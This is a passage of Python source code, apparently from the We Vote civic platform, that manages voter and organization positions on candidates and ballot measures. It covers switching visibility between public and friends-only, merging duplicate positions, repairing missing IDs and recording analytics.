organization_id_missing = positive_value_exists(existing_position.organization_we_vote_id) \
and not positive_value_exists(existing_position.organization_id)
if organization_id_missing or organization_we_vote_id_missing:
organization_manager = OrganizationManager()
# Heal data: Make sure we have both org_id and org_we_vote_id
if organization_id_missing:
existing_position.organization_id = organization_manager.fetch_organization_id(
existing_position.organization_we_vote_id)
elif organization_we_vote_id_missing:
existing_position.organization_we_vote_id = organization_manager.fetch_we_vote_id_from_local_id(
existing_position.organization_id)
# Heal data: Make sure we have both voter_id and voter_we_vote_id
voter_id_missing = positive_value_exists(existing_position.voter_we_vote_id) \
and not positive_value_exists(existing_position.voter_id)
voter_we_vote_id_missing = positive_value_exists(existing_position.voter_id) \
and not positive_value_exists(existing_position.voter_we_vote_id)
if voter_id_missing:
existing_position.voter_id = fetch_voter_id_from_voter_we_vote_id(existing_position.voter_we_vote_id)
elif voter_we_vote_id_missing:
existing_position.voter_we_vote_id = fetch_voter_we_vote_id_from_voter_id(existing_position.voter_id)
# Is there any organization data save with this position yet?
organization_link_missing = not positive_value_exists(existing_position.organization_we_vote_id)
if organization_link_missing:
# If here, there isn't any organization information stored with this position. We need to see if
# an organization exists that is linked to this voter, and if so, heal the data
voter_manager = VoterManager()
# Look up the voter who owns this position
if positive_value_exists(existing_position.voter_we_vote_id):
voter_owner_results = voter_manager.retrieve_voter_by_we_vote_id(existing_position.voter_we_vote_id)
if voter_owner_results['voter_found']:
voter_owner = voter_owner_results['voter']
organization_manager = OrganizationManager()
if positive_value_exists(voter_owner.linked_organization_we_vote_id):
# This voter is linked to an org, so we can bring that data over to save in this position
existing_position.organization_we_vote_id = voter_owner.linked_organization_we_vote_id
existing_position.organization_id = organization_manager.fetch_organization_id(
existing_position.organization_we_vote_id)
else:
# If here, we need to do some looking to see if an org exists that matches this voter
status += "POSITION_SWITCH_TO_PUBLIC_POSITION-LOOK_FOR_ORG"
pass
else:
status += "POSITION_SWITCH_TO_PUBLIC_POSITION-VOTER_WE_VOTE_ID_NOT_FOUND"
# Verify data: We may have in the position org and voter, but they don't match
# ??? If in doubt, give position to the organization
# Position could have been from voter friends-only, so we don't have *either* org_id or org_we_vote_id
# Once they push them live, we need to make sure an organization exists for them
# voter_manager = VoterManager()
# ######################
# CASE 1: It was a friend's only position, and we need to create an org to push it public with
# if positive_value_exists(existing_position.voter_we_vote_id):
# organization_missing = not positive_value_exists(existing_position.organization_id) \
# and not positive_value_exists(existing_position.organization_we_vote_id)
# if organization_missing:
# pass
# Check voter record for linked org
# If voter record has link to org, fill the position with the org ids
#
# If no linked_org in voter, check to see if voter's twitter handle wasn't being used by existing org
#
# If twitter handle not used by existing org, create new org
#
#
# Check that the org isn't already linked to another voter
# If not linked,
# # Heal the data
# results = voter_manager.retrieve_voter_by_we_vote_id(existing_position.voter_we_vote_id)
# if results['voter_found']:
# voter = results['voter']
# # We found this voter from the existing position. Now we must make sure that the voter and
# # organization specified by the position all match
# if positive_value_exists(voter.linked_organization_we_vote_id) and
# voter.linked_organization_we_vote_id == existing_position:
# if organization_id_missing:
# existing_position.organization_we_vote_id = voter.linked_organization_we_vote_id
# # Look up the organization_id
# existing_position.organization_id = organization_manager.fetch_organization_id(
# voter.linked_organization_we_vote_id)
# ######################
# CASE 2: It is an org position, and we need to tie it to a voter
# ######################
# Note: We make sure a voter guide exists for this election and organization, in switch_position_visibility
switch_to_public_position = True
switch_position_visibility_results = self.switch_position_visibility(
existing_position, switch_to_public_position)
results = {
'success': switch_position_visibility_results['success'],
'status': status + switch_position_visibility_results['status'],
'position_copied': switch_position_visibility_results['position_copied'],
'position_deleted': switch_position_visibility_results['position_deleted'],
'position': switch_position_visibility_results['position'],
'is_public_position': switch_position_visibility_results['is_public_position'],
}
return results
def transfer_to_friends_only_position(self, existing_position):
# Check to make sure existing_position comes from PositionForFriends
if not existing_position._meta.object_name == "PositionEntered":
results = {
'success': False,
'status': "SWITCH_TO_FRIENDS_ONLY_POSITION_SUCCESS-NOT_PositionEntered",
'position_copied': False,
'position_deleted': False,
'position': PositionForFriends(),
'is_public_position': None,
}
return results
switch_to_public_position = False
return self.switch_position_visibility(existing_position, switch_to_public_position)
def switch_position_visibility(self, existing_position, switch_to_public_position):
# We assume one does NOT exist in the other table
position_deleted = False
if switch_to_public_position:
new_position_starter = PositionEntered
new_position = PositionEntered() # For errors
else:
new_position_starter = PositionForFriends
new_position = PositionForFriends()
try:
# Make sure a google_civic_election_id is stored
if not positive_value_exists(existing_position.google_civic_election_id):
# We want to retrieve the google_civic_election_id from the ballot item object
if positive_value_exists(existing_position.candidate_campaign_we_vote_id):
candidate_campaign_manager = CandidateCampaignManager()
results = candidate_campaign_manager.retrieve_candidate_campaign_from_we_vote_id(
existing_position.candidate_campaign_we_vote_id)
if results['candidate_campaign_found']:
candidate_campaign = results['candidate_campaign']
existing_position.google_civic_election_id = \
candidate_campaign.google_civic_election_id
if positive_value_exists(candidate_campaign.state_code):
existing_position.state_code = candidate_campaign.state_code
elif positive_value_exists(existing_position.contest_measure_we_vote_id):
contest_measure_manager = ContestMeasureManager()
results = contest_measure_manager.retrieve_contest_measure_from_we_vote_id(
existing_position.contest_measure_we_vote_id)
if results['contest_measure_found']:
contest_measure = results['contest_measure']
existing_position.google_civic_election_id = contest_measure.google_civic_election_id
if positive_value_exists(contest_measure.state_code):
existing_position.state_code = contest_measure.state_code
elif positive_value_exists(existing_position.contest_office_we_vote_id):
contest_office_manager = ContestOfficeManager()
results = contest_office_manager.retrieve_contest_office_from_we_vote_id(
existing_position.contest_office_we_vote_id)
if results['contest_office_found']:
contest_office = results['contest_office']
existing_position.google_civic_election_id = contest_office.google_civic_election_id
if positive_value_exists(contest_office.state_code):
existing_position.state_code = contest_office.state_code
new_position = new_position_starter.objects.create(
we_vote_id=existing_position.we_vote_id,
date_entered=existing_position.date_entered,
date_last_changed=existing_position.date_last_changed,
organization_id=existing_position.organization_id,
organization_we_vote_id=existing_position.organization_we_vote_id,
voter_we_vote_id=existing_position.voter_we_vote_id,
voter_id=existing_position.voter_id,
google_civic_election_id=existing_position.google_civic_election_id,
state_code=existing_position.state_code,
google_civic_candidate_name=existing_position.google_civic_candidate_name,
tweet_source_id=existing_position.tweet_source_id,
ballot_item_display_name=existing_position.ballot_item_display_name,
ballot_item_image_url_https=existing_position.ballot_item_image_url_https,
ballot_item_twitter_handle=existing_position.ballot_item_twitter_handle,
contest_office_we_vote_id=existing_position.contest_office_we_vote_id,
contest_office_id=existing_position.contest_office_id,
candidate_campaign_we_vote_id=existing_position.candidate_campaign_we_vote_id,
candidate_campaign_id=existing_position.candidate_campaign_id,
politician_we_vote_id=existing_position.politician_we_vote_id,
politician_id=existing_position.politician_id,
contest_measure_we_vote_id=existing_position.contest_measure_we_vote_id,
contest_measure_id=existing_position.contest_measure_id,
google_civic_measure_title=existing_position.google_civic_measure_title,
stance=existing_position.stance,
statement_text=existing_position.statement_text,
statement_html=existing_position.statement_html,
more_info_url=existing_position.more_info_url,
from_scraper=existing_position.from_scraper,
organization_certified=existing_position.organization_certified,
volunteer_certified=existing_position.volunteer_certified,
twitter_user_entered_position_id=existing_position.twitter_user_entered_position_id,
voter_entering_position_id=existing_position.voter_entering_position_id,
public_figure_we_vote_id=existing_position.public_figure_we_vote_id,
vote_smart_time_span=existing_position.vote_smart_time_span,
vote_smart_rating_id=existing_position.vote_smart_rating_id,
vote_smart_rating=existing_position.vote_smart_rating,
vote_smart_rating_name=existing_position.vote_smart_rating_name,
speaker_display_name=existing_position.speaker_display_name,
speaker_image_url_https=existing_position.speaker_image_url_https,
speaker_twitter_handle=existing_position.speaker_twitter_handle,
)
status = 'SWITCH_POSITION_VISIBILITY_SUCCESS'
position_copied = True
success = True
if switch_to_public_position:
is_public_position = True
if positive_value_exists(existing_position.organization_we_vote_id) \
and positive_value_exists(existing_position.google_civic_election_id):
voter_guide_manager = VoterGuideManager()
# Make sure we have a voter guide so others can find
if not voter_guide_manager.voter_guide_exists(existing_position.organization_we_vote_id,
existing_position.google_civic_election_id):
voter_guide_we_vote_id = ''
voter_guide_manager.update_or_create_organization_voter_guide_by_election_id(
voter_guide_we_vote_id,
existing_position.organization_we_vote_id, existing_position.google_civic_election_id,
existing_position.state_code)
else:
is_public_position = False
except Exception as e:
status = 'SWITCH_POSITION_VISIBILITY_FAILED'
position_copied = False
success = False
if switch_to_public_position:
is_public_position = False
else:
is_public_position = True
if position_copied:
# If here, we successfully copied the position and now we need to delete the old one
try:
existing_position.delete()
position_deleted = True
except Exception as e:
status = 'SWITCH_POSITION_VISIBILITY_FAILED-UNABLE_TO_DELETE'
position_deleted = False
success = False
results = {
'success': success,
'status': status,
'position_copied': position_copied,
'position_deleted': position_deleted,
'position': new_position,
'is_public_position': is_public_position,
}
return results
def merge_into_public_position(self, position_to_keep):
status = "MERGE_INTO_PUBLIC_POSITION "
# Check to see if there is an equivalent position in the PositionForFriends table
position_we_vote_id = ""
retrieve_position_for_friends = True
ballot_item_identifier_found = positive_value_exists(position_to_keep.contest_office_id) \
or positive_value_exists(position_to_keep.candidate_campaign_id) \
or positive_value_exists(position_to_keep.contest_measure_id) \
or positive_value_exists(position_to_keep.contest_office_we_vote_id) \
or positive_value_exists(position_to_keep.candidate_campaign_we_vote_id) \
or positive_value_exists(position_to_keep.contest_measure_we_vote_id)
if ballot_item_identifier_found:
google_civic_election_id = 0 # Not necessary if there is ballot_item
else:
google_civic_election_id = position_to_keep.google_civic_election_id
results = self.retrieve_position(position_we_vote_id,
position_to_keep.organization_id, position_to_keep.organization_we_vote_id,
position_to_keep.voter_id,
position_to_keep.contest_office_id, position_to_keep.candidate_campaign_id,
position_to_keep.contest_measure_id,
retrieve_position_for_friends,
position_to_keep.voter_we_vote_id, position_to_keep.contest_office_we_vote_id,
position_to_keep.candidate_campaign_we_vote_id,
position_to_keep.contest_measure_we_vote_id,
google_civic_election_id,
position_to_keep.vote_smart_time_span)
if results['position_found']:
dead_position = results['position']
else:
results = {
'success': True,
'status': "MERGE_INTO_PUBLIC_POSITION-NO_NEED",
'position_merged': False,
'position_deleted': False,
'is_public_position': True,
}
return results
merge_position_visibility_results = self.merge_position_visibility(
position_to_keep, dead_position)
results = {
'success': merge_position_visibility_results['success'],
'status': status + merge_position_visibility_results['status'],
'position_copied': merge_position_visibility_results['position_copied'],
'position_deleted': merge_position_visibility_results['position_deleted'],
'position': merge_position_visibility_results['position'],
'is_public_position': merge_position_visibility_results['is_public_position'],
}
return results
def merge_into_friends_only_position(self, position_to_keep):
status = "MERGE_INTO_FRIENDS_ONLY_POSITION "
# Check to see if there is an equivalent position in the PositionEntered table
position_we_vote_id = ""
retrieve_position_for_friends = False
ballot_item_identifier_found = positive_value_exists(position_to_keep.contest_office_id) \
or positive_value_exists(position_to_keep.candidate_campaign_id) \
or positive_value_exists(position_to_keep.contest_measure_id) \
or positive_value_exists(position_to_keep.contest_office_we_vote_id) \
or positive_value_exists(position_to_keep.candidate_campaign_we_vote_id) \
or positive_value_exists(position_to_keep.contest_measure_we_vote_id)
if ballot_item_identifier_found:
google_civic_election_id = 0 # Not necessary if there is ballot_item
else:
google_civic_election_id = position_to_keep.google_civic_election_id
results = self.retrieve_position(position_we_vote_id,
position_to_keep.organization_id, position_to_keep.organization_we_vote_id,
position_to_keep.voter_id,
position_to_keep.contest_office_id, position_to_keep.candidate_campaign_id,
position_to_keep.contest_measure_id,
retrieve_position_for_friends,
position_to_keep.voter_we_vote_id, position_to_keep.contest_office_we_vote_id,
position_to_keep.candidate_campaign_we_vote_id,
position_to_keep.contest_measure_we_vote_id,
google_civic_election_id,
position_to_keep.vote_smart_time_span)
if results['position_found']:
dead_position = results['position']
else:
results = {
'success': True,
'status': "MERGE_INTO_FRIENDS_ONLY_POSITION-NO_NEED",
'position_merged': False,
'position_deleted': False,
'is_public_position': True,
}
return results
merge_position_visibility_results = self.merge_position_visibility(
position_to_keep, dead_position)
results = {
'success': merge_position_visibility_results['success'],
'status': status + merge_position_visibility_results['status'],
'position_copied': merge_position_visibility_results['position_copied'],
'position_deleted': merge_position_visibility_results['position_deleted'],
'position': merge_position_visibility_results['position'],
'is_public_position': merge_position_visibility_results['is_public_position'],
}
return results
def merge_position_visibility(self, position_to_keep, dead_position):
# We want to see if dead_position has any values to save before we delete it.
data_transferred = False
if not position_to_keep.stance == SUPPORT and not position_to_keep.stance == OPPOSE:
if dead_position.stance == SUPPORT or dead_position.stance == OPPOSE:
position_to_keep.stance = dead_position.stance
data_transferred = True
if not positive_value_exists(position_to_keep.more_info_url):
if positive_value_exists(dead_position.more_info_url):
position_to_keep.more_info_url = dead_position.more_info_url
data_transferred = True
if not positive_value_exists(position_to_keep.statement_text):
if positive_value_exists(dead_position.statement_text):
position_to_keep.statement_text = dead_position.statement_text
data_transferred = True
if not positive_value_exists(position_to_keep.statement_html):
if positive_value_exists(dead_position.statement_html):
position_to_keep.statement_html = dead_position.statement_html
data_transferred = True
if data_transferred:
status = "MERGE_POSITION_VISIBILITY-DATA_TRANSFERRED"
else:
status = "MERGE_POSITION_VISIBILITY-DATA_NOT_TRANSFERRED"
# Now delete the dead_position
try:
dead_position.delete()
position_deleted = True
success = True
except Exception as e:
status = 'SWITCH_POSITION_VISIBILITY_FAILED-UNABLE_TO_DELETE'
position_deleted = False
success = False
results = {
'success': success,
'status': status,
'position': position_to_keep,
'position_deleted': position_deleted,
'position_data_transferred': data_transferred,
}
return results
def position_speaker_name_needs_repair(self, position, speaker_display_name):
"""
See also organization_name_needs_repair
:param position:
:param speaker_display_name:
:return:
"""
if not hasattr(position, 'speaker_display_name'):
return False
if not positive_value_exists(speaker_display_name):
# Repair not needed if there isn't a speaker_display_name to change to
return False
if speaker_display_name.startswith("Voter-") \
or speaker_display_name.startswith("null") \
or speaker_display_name is "" \
or speaker_display_name.startswith("wv"):
# Repair not needed if the speaker_display_name is a temporary name too
return False
if speaker_display_name != position.speaker_display_name:
# If the position.speaker_display_name doesn't match the incoming speaker_display_name
return True
return False
def toggle_on_voter_support_for_candidate_campaign(self, voter_id, candidate_campaign_id, user_agent_string,
user_agent_object):
stance = SUPPORT
position_manager = PositionManager()
return position_manager.toggle_on_voter_position_for_candidate_campaign(
voter_id, candidate_campaign_id, stance, user_agent_string, user_agent_object)
def toggle_off_voter_support_for_candidate_campaign(self, voter_id, candidate_campaign_id, user_agent_string,
user_agent_object):
stance = NO_STANCE
position_manager = PositionManager()
return position_manager.toggle_on_voter_position_for_candidate_campaign(
voter_id, candidate_campaign_id, stance, user_agent_string, user_agent_object)
def toggle_on_voter_oppose_for_candidate_campaign(self, voter_id, candidate_campaign_id, user_agent_string,
user_agent_object):
stance = OPPOSE
position_manager = PositionManager()
return position_manager.toggle_on_voter_position_for_candidate_campaign(
voter_id, candidate_campaign_id, stance, user_agent_string, user_agent_object)
def toggle_off_voter_oppose_for_candidate_campaign(self, voter_id, candidate_campaign_id, user_agent_string,
user_agent_object):
stance = NO_STANCE
position_manager = PositionManager()
return position_manager.toggle_on_voter_position_for_candidate_campaign(
voter_id, candidate_campaign_id, stance, user_agent_string, user_agent_object)
def toggle_on_voter_position_for_candidate_campaign(self, voter_id, candidate_campaign_id, stance,
user_agent_string, user_agent_object):
# Does a position from this voter already exist?
position_manager = PositionManager()
contest_measure_id = 0
status = ""
results = position_manager.retrieve_voter_candidate_campaign_position(voter_id, candidate_campaign_id)
is_public_position = results['is_public_position']
status += results['status']
if results['MultipleObjectsReturned']:
status += results['status']
status += 'MultipleObjectsReturned '
retrieve_position_for_friends = not is_public_position
merge_results = position_manager.merge_position_duplicates_voter_candidate_campaign_position(
voter_id, candidate_campaign_id, retrieve_position_for_friends)
status += merge_results['status']
if not positive_value_exists(merge_results['duplicates_repaired']):
if is_public_position:
voter_position_on_stage = PositionEntered()
else:
voter_position_on_stage = PositionForFriends()
results = {
'status': status,
'success': False,
'position_we_vote_id': '',
'position': voter_position_on_stage,
}
return results
status += 'CANDIDATE_DUPLICATES_REPAIRED '
results_after_repair = position_manager.retrieve_voter_candidate_campaign_position(
voter_id, candidate_campaign_id)
status += results_after_repair['status']
is_public_position = results_after_repair['is_public_position']
if results_after_repair['MultipleObjectsReturned']:
status += 'MultipleObjectsReturned-WORK_NEEDED2 '
if is_public_position:
voter_position_on_stage = PositionEntered()
else:
voter_position_on_stage = PositionForFriends()
results = {
'status': status,
'success': False,
'position_we_vote_id': '',
'position': voter_position_on_stage,
}
return results
voter_position_found = results_after_repair['position_found']
voter_position_on_stage = results_after_repair['position']
else:
voter_position_found = results['position_found']
voter_position_on_stage = results['position']
toggle_results = position_manager.toggle_voter_position(
voter_id, voter_position_found, voter_position_on_stage,
stance, candidate_campaign_id, contest_measure_id,
is_public_position, user_agent_string, user_agent_object)
status += toggle_results['status']
success = toggle_results['success']
voter_position_on_stage = toggle_results['position']
position_we_vote_id = toggle_results['position_we_vote_id']
results = {
'status': status,
'success': success,
'position_we_vote_id': position_we_vote_id,
'position': voter_position_on_stage,
}
return results
def toggle_voter_position(self, voter_id, voter_position_found, voter_position_on_stage, stance,
candidate_campaign_id, contest_measure_id, is_public_position, user_agent_string,
user_agent_object):
status = ""
voter_position_on_stage_found = False
position_we_vote_id = ''
voter_we_vote_id = ''
is_signed_in = False
google_civic_election_id = 0
linked_organization_we_vote_id = ""
candidate_campaign_we_vote_id = ""
contest_measure_we_vote_id = ""
voter_manager = VoterManager()
position_list_manager = PositionListManager()
if voter_position_found:
# Update this position with new values
try:
voter_position_on_stage.stance = stance
# message = "[stance: " + stance + "]"
# print_to_log(logger=logger, exception_message_optional=message)
if voter_position_on_stage.candidate_campaign_id:
if not positive_value_exists(voter_position_on_stage.candidate_campaign_we_vote_id):
# Heal the data, and fill in the candidate_campaign_we_vote_id
candidate_campaign_manager = CandidateCampaignManager()
results = candidate_campaign_manager.retrieve_candidate_campaign_from_id(
candidate_campaign_id)
if results['candidate_campaign_found']:
candidate_campaign = results['candidate_campaign']
candidate_campaign_we_vote_id = candidate_campaign.we_vote_id
google_civic_election_id = candidate_campaign.google_civic_election_id
voter_position_on_stage.candidate_campaign_we_vote_id = candidate_campaign.we_vote_id
voter_position_on_stage.google_civic_election_id = \
candidate_campaign.google_civic_election_id
voter_position_on_stage.state_code = candidate_campaign.state_code
voter_position_on_stage.ballot_item_display_name = candidate_campaign.candidate_name
else:
candidate_campaign_we_vote_id = voter_position_on_stage.candidate_campaign_we_vote_id
google_civic_election_id = voter_position_on_stage.google_civic_election_id
except Exception as e:
handle_record_not_saved_exception(e, logger=logger)
status += 'STANCE_COULD_NOT_BE_UPDATED1 '
try:
if voter_position_on_stage.contest_measure_id:
if not positive_value_exists(voter_position_on_stage.contest_measure_we_vote_id):
# Heal the data, and fill in the contest_measure_we_vote_id
contest_measure_manager = ContestMeasureManager()
results = contest_measure_manager.retrieve_contest_measure_from_id(contest_measure_id)
if results['contest_measure_found']:
contest_measure = results['contest_measure']
contest_measure_we_vote_id = contest_measure.we_vote_id
google_civic_election_id = contest_measure.google_civic_election_id
voter_position_on_stage.contest_measure_we_vote_id = contest_measure.we_vote_id
voter_position_on_stage.google_civic_election_id = contest_measure.google_civic_election_id
voter_position_on_stage.state_code = contest_measure.state_code
voter_position_on_stage.ballot_item_display_name = contest_measure.measure_title
else:
contest_measure_we_vote_id = voter_position_on_stage.contest_measure_we_vote_id
google_civic_election_id = voter_position_on_stage.google_civic_election_id
except Exception as e:
handle_record_not_saved_exception(e, logger=logger)
status += 'STANCE_COULD_NOT_BE_UPDATED2 '
try:
results = voter_manager.retrieve_voter_by_id(voter_id)
if results['voter_found']:
voter = results['voter']
voter_we_vote_id = voter.we_vote_id
voter_manager.update_voter_by_object(voter, data_to_preserve=True)
is_signed_in = voter.is_signed_in()
linked_organization_we_vote_id = voter.linked_organization_we_vote_id
# Heal the data: Make sure we have a voter_we_vote_id
voter_position_on_stage.voter_we_vote_id = voter_we_vote_id
# Heal the data
if not positive_value_exists(linked_organization_we_vote_id):
organization_manager = OrganizationManager()
repair_results = organization_manager.repair_missing_linked_organization_we_vote_id(voter)
status += repair_results['status']
if repair_results['voter_repaired']:
voter = repair_results['voter']
linked_organization_we_vote_id = voter.linked_organization_we_vote_id
if positive_value_exists(linked_organization_we_vote_id):
voter_position_on_stage.organization_we_vote_id = linked_organization_we_vote_id
# Look up the organization_id
organization_manager = OrganizationManager()
organization_results = organization_manager.retrieve_organization_from_we_vote_id(
linked_organization_we_vote_id)
if organization_results['organization_found']:
organization = organization_results['organization']
organization_id = organization.id
speaker_display_name = organization.organization_name
voter_position_on_stage.speaker_display_name = speaker_display_name
voter_position_on_stage.organization_id = organization_id
except Exception as e:
handle_record_not_saved_exception(e, logger=logger)
status += 'STANCE_COULD_NOT_BE_UPDATED3 '
# try:
voter_position_on_stage.save()
position_list_manager.update_position_network_scores_for_one_position(voter_position_on_stage)
position_we_vote_id = voter_position_on_stage.we_vote_id
voter_position_on_stage_found = True
status += 'STANCE_UPDATED '
# except Exception as e:
# handle_record_not_saved_exception(e, logger=logger)
# status += 'STANCE_COULD_NOT_BE_UPDATED4 '
else:
try:
# Create new
candidate_campaign_we_vote_id = ""
google_civic_election_id = 0
state_code = ''
ballot_item_display_name = ""
if candidate_campaign_id:
candidate_campaign_manager = CandidateCampaignManager()
results = candidate_campaign_manager.retrieve_candidate_campaign_from_id(
candidate_campaign_id)
if results['candidate_campaign_found']:
candidate_campaign = results['candidate_campaign']
candidate_campaign_we_vote_id = candidate_campaign.we_vote_id
google_civic_election_id = candidate_campaign.google_civic_election_id
state_code = candidate_campaign.state_code
ballot_item_display_name = candidate_campaign.candidate_name
contest_measure_we_vote_id = ""
if contest_measure_id:
contest_measure_manager = ContestMeasureManager()
results = contest_measure_manager.retrieve_contest_measure_from_id(contest_measure_id)
if results['contest_measure_found']:
contest_measure = results['contest_measure']
contest_measure_we_vote_id = contest_measure.we_vote_id
google_civic_election_id = contest_measure.google_civic_election_id
state_code = contest_measure.state_code
ballot_item_display_name = contest_measure.measure_title
# In order to show a position publicly we need to tie the position to either organization_we_vote_id,
# public_figure_we_vote_id or candidate_we_vote_id. For now (2016-8-17) we assume organization
results = voter_manager.retrieve_voter_by_id(voter_id)
organization_id = 0
linked_organization_we_vote_id = ""
voter_we_vote_id = ""
speaker_display_name = ""
if results['voter_found']:
voter = results['voter']
voter_we_vote_id = voter.we_vote_id
voter_manager.update_voter_by_object(voter, data_to_preserve=True)
is_signed_in = voter.is_signed_in()
linked_organization_we_vote_id = voter.linked_organization_we_vote_id
# Heal the data
if not positive_value_exists(linked_organization_we_vote_id):
organization_manager = OrganizationManager()
repair_results = organization_manager.repair_missing_linked_organization_we_vote_id(voter)
status += repair_results['status']
if repair_results['voter_repaired']:
voter = repair_results['voter']
linked_organization_we_vote_id = voter.linked_organization_we_vote_id
if positive_value_exists(linked_organization_we_vote_id):
# Look up the organization_id
organization_manager = OrganizationManager()
organization_results = organization_manager.retrieve_organization_from_we_vote_id(
voter.linked_organization_we_vote_id)
if organization_results['organization_found']:
organization = organization_results['organization']
organization_id = organization.id
speaker_display_name = organization.organization_name
if is_public_position:
voter_position_on_stage = PositionEntered(
voter_id=voter_id,
voter_we_vote_id=voter_we_vote_id,
candidate_campaign_id=candidate_campaign_id,
candidate_campaign_we_vote_id=candidate_campaign_we_vote_id,
contest_measure_id=contest_measure_id,
contest_measure_we_vote_id=contest_measure_we_vote_id,
stance=stance,
google_civic_election_id=google_civic_election_id,
state_code=state_code,
organization_id=organization_id,
organization_we_vote_id=linked_organization_we_vote_id,
ballot_item_display_name=ballot_item_display_name,
speaker_display_name=speaker_display_name,
)
else:
voter_position_on_stage = PositionForFriends(
voter_id=voter_id,
voter_we_vote_id=voter_we_vote_id,
candidate_campaign_id=candidate_campaign_id,
candidate_campaign_we_vote_id=candidate_campaign_we_vote_id,
contest_measure_id=contest_measure_id,
contest_measure_we_vote_id=contest_measure_we_vote_id,
stance=stance,
google_civic_election_id=google_civic_election_id,
state_code=state_code,
organization_id=organization_id,
organization_we_vote_id=linked_organization_we_vote_id,
ballot_item_display_name=ballot_item_display_name,
speaker_display_name=speaker_display_name,
)
voter_position_on_stage.save()
position_list_manager.update_position_network_scores_for_one_position(voter_position_on_stage)
position_we_vote_id = voter_position_on_stage.we_vote_id
voter_position_on_stage_found = True
status += 'NEW_STANCE_SAVED'
except Exception as e:
handle_record_not_saved_exception(e, logger=logger)
status += 'NEW_STANCE_COULD_NOT_BE_SAVED'
if voter_position_on_stage_found:
# If here we need to make sure a voter guide exists
if positive_value_exists(linked_organization_we_vote_id) \
and positive_value_exists(google_civic_election_id):
voter_guide_manager = VoterGuideManager()
if not voter_guide_manager.voter_guide_exists(linked_organization_we_vote_id, google_civic_election_id):
# Create voter guide
voter_guide_we_vote_id = ""
results = voter_guide_manager.update_or_create_organization_voter_guide_by_election_id(
voter_guide_we_vote_id, linked_organization_we_vote_id, google_civic_election_id)
# If here, we are storing an analytics entry
state_code = ''
organization_id_temp = 0
organization_we_vote_id_temp = "" # Maybe we should record organization_we_vote_id?
if positive_value_exists(candidate_campaign_we_vote_id):
ballot_item_we_vote_id = candidate_campaign_we_vote_id
elif positive_value_exists(contest_measure_we_vote_id):
ballot_item_we_vote_id = contest_measure_we_vote_id
else:
ballot_item_we_vote_id = ""
is_bot = user_agent_object.is_bot or robot_detection.is_robot(user_agent_string)
analytics_manager = AnalyticsManager()
analytics_results = analytics_manager.save_action(
ACTION_POSITION_TAKEN, voter_we_vote_id, voter_id, is_signed_in, state_code,
organization_we_vote_id_temp, organization_id_temp,
google_civic_election_id, user_agent_string=user_agent_string, is_bot=is_bot,
is_mobile=user_agent_object.is_mobile, is_desktop=user_agent_object.is_pc,
is_tablet=user_agent_object.is_tablet, ballot_item_we_vote_id=ballot_item_we_vote_id)
results = {
'status': status,
'success': True if voter_position_on_stage_found else False,
'position_we_vote_id': position_we_vote_id,
'position': voter_position_on_stage,
}
return results
def toggle_on_voter_support_for_contest_measure(self, voter_id, contest_measure_id,
user_agent_string, user_agent_object):
stance = SUPPORT
position_manager = PositionManager()
return position_manager.toggle_on_voter_position_for_contest_measure(
voter_id, contest_measure_id, stance, user_agent_string, user_agent_object)
def toggle_off_voter_support_for_contest_measure(self, voter_id, contest_measure_id,
user_agent_string, user_agent_object):
stance = NO_STANCE
position_manager = PositionManager()
return position_manager.toggle_on_voter_position_for_contest_measure(
voter_id, contest_measure_id, stance, user_agent_string, user_agent_object)
def toggle_on_voter_oppose_for_contest_measure(self, voter_id, contest_measure_id,
user_agent_string, user_agent_object):
stance = OPPOSE
position_manager = PositionManager()
return position_manager.toggle_on_voter_position_for_contest_measure(
voter_id, contest_measure_id, stance, user_agent_string, user_agent_object)
def toggle_off_voter_oppose_for_contest_measure(self, voter_id, contest_measure_id,
user_agent_string, user_agent_object):
stance = NO_STANCE
position_manager = PositionManager()
return position_manager.toggle_on_voter_position_for_contest_measure(
voter_id, contest_measure_id, stance, user_agent_string, user_agent_object)
def toggle_on_voter_position_for_contest_measure(self, voter_id, contest_measure_id, stance,
user_agent_string, user_agent_object):
# Does a position from this voter already exist?
position_manager = PositionManager()
duplicates_found = False
status = ""
results = position_manager.retrieve_voter_contest_measure_position(voter_id, contest_measure_id)
is_public_position = results['is_public_position']
if results['MultipleObjectsReturned']:
status += results['status']
status += 'MultipleObjectsReturned-WORK_NEEDED '
retrieve_position_for_friends = not is_public_position
merge_results = position_manager.merge_position_duplicates_voter_contest_measure_position(
voter_id, contest_measure_id, retrieve_position_for_friends)
status += merge_results['status']
if merge_results['duplicates_repaired']:
duplicates_found = False
results = position_manager.retrieve_voter_contest_measure_position(voter_id, contest_measure_id)
status += results['status']
is_public_position = results['is_public_position']
if results['MultipleObjectsReturned']:
duplicates_found = True
status += 'MultipleObjectsReturned-WORK_NEEDED2 '
if duplicates_found:
if is_public_position:
voter_position_on_stage = PositionEntered()
else:
voter_position_on_stage = PositionForFriends()
results = {
'status': status,
'success': False,
'position_we_vote_id': '',
'position': voter_position_on_stage,
}
return results
voter_position_found = results['position_found']
voter_position_on_stage = results['position']
candidate_campaign_id = 0
return position_manager.toggle_voter_position(voter_id, voter_position_found, voter_position_on_stage,
stance, candidate_campaign_id, contest_measure_id,
is_public_position, user_agent_string, user_agent_object)
def update_or_create_position_comment(self, position_we_vote_id, voter_id, voter_we_vote_id,
office_we_vote_id, candidate_we_vote_id, measure_we_vote_id,
statement_text, statement_html):
voter_position_found = False
is_public_position = False
problem_with_duplicate_in_same_table = False
status = ""
position_list_manager = PositionListManager()
# Set this in case of error
voter_position_on_stage = PositionForFriends()
if positive_value_exists(position_we_vote_id):
# Retrieve the position this way
pass
else:
if not positive_value_exists(voter_id):
voter_id = fetch_voter_id_from_voter_we_vote_id(voter_we_vote_id)
if positive_value_exists(candidate_we_vote_id):
results = self.retrieve_voter_candidate_campaign_position_with_we_vote_id(
voter_id, candidate_we_vote_id)
is_public_position = results['is_public_position']
if results['position_found']:
voter_position_found = True
voter_position_on_stage = results['position']
elif results['MultipleObjectsReturned']:
problem_with_duplicate_in_same_table = True
status += "UPDATE_OR_CREATE_POSITION_COMMENT-MultipleObjectsReturned-CANDIDATE "
retrieve_position_for_friends = not is_public_position
merge_results = self.merge_position_duplicates_voter_candidate_campaign_position_with_we_vote_id(
voter_id, candidate_we_vote_id, retrieve_position_for_friends)
status += merge_results['status']
if merge_results['duplicates_repaired']:
problem_with_duplicate_in_same_table = False
results = self.retrieve_voter_candidate_campaign_position_with_we_vote_id(
voter_id, candidate_we_vote_id)
status += results['status']
is_public_position = results['is_public_position']
if results['MultipleObjectsReturned']:
problem_with_duplicate_in_same_table = True
status += 'MultipleObjectsReturned-WORK_NEEDED2 '
elif positive_value_exists(office_we_vote_id):
# TODO
pass
